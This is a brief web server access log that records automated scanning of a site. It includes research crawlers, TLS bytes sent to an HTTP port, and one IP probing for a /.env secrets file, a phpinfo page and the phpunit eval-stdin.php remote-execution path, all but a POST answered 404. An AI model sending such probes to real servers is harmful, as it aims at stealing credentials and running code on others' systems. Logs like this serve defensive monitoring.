87.236.176.170 - - [03/Feb/2024:04:42:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
45.79.181.104 - - [03/Feb/2024:04:42:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:43:58 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:43:59 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:44:00 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [03/Feb/2024:04:44:00 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
65.49.1.54 - - [03/Feb/2024:04:45:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.130 - - [03/Feb/2024:04:45:41 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.159 - - [03/Feb/2024:04:45:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.32 - - [03/Feb/2024:04:46:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
184.105.247.195 - - [03/Feb/2024:04:46:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [03/Feb/2024:04:53:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.211.157 - - [03/Feb/2024:04:53:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
192.155.88.231 - - [03/Feb/2024:04:56:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
